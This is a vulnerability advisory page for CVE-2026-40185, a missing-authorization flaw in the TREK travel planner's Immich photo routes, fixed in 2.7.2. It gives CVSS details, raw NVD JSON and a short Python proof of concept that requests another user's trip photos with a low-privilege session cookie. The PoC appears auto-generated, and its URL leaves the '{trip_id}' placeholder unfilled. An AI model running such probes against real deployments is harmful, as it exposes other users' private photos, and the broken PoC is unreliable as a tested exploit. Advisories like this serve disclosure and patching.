Security Vulnerability Report
中文
CVE-2026-40185 CVSS 7.1 HIGH

CVE-2026-40185

Published: 2026-04-10 20:16:24
Last Modified: 2026-04-21 19:22:44
Source: [email protected]

Description

TREK is a collaborative travel planner. Prior to 2.7.2, TREK was missing authorization checks on the Immich trip photo management routes. This vulnerability is fixed in 2.7.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mauriceboe:trek:*:*:*:*:*:node.js:*:* - VULNERABLE
TREK < 2.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-40185: TREK Immich Photo Management Authorization Bypass Description: Exploits missing authorization checks to access/manipulate trip photos. """ import requests target_url = "http://localhost:3000/api/trips/{trip_id}/photos" attacker_cookie = "session=low_priv_user_session_token" # Attacker tries to access photos of a trip they do not own headers = { "Cookie": attacker_cookie, "User-Agent": "CVE-2026-40185-Scanner" } try: response = requests.get(target_url, headers=headers) if response.status_code == 200: print("[+] Vulnerability Confirmed: Unauthorized access to photo data successful!") print(f"[+] Data leaked: {response.text[:200]}...") else: print("[-] Target may not be vulnerable or patched.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40185", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:23.573", "lastModified": "2026-04-21T19:22:43.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TREK is a collaborative travel planner. Prior to 2.7.2, TREK was missing authorization checks on the Immich trip photo management routes. This vulnerability is fixed in 2.7.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mauriceboe:trek:*:*:*:*:*:node.js:*:*", "versionEndIncluding": "2.7.1", "matchCriteriaId": "FF5D262A-7F86-423E-9001-27183BE3840F"}]}]}], "references": [{"url": "https://github.com/mauriceboe/TREK/commit/16277a3811a00c2983f7486fee83c112986cb179", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mauriceboe/TREK/releases/tag/v2.7.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/mauriceboe/TREK/security/advisories/GHSA-pcr3-6647-jh72", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.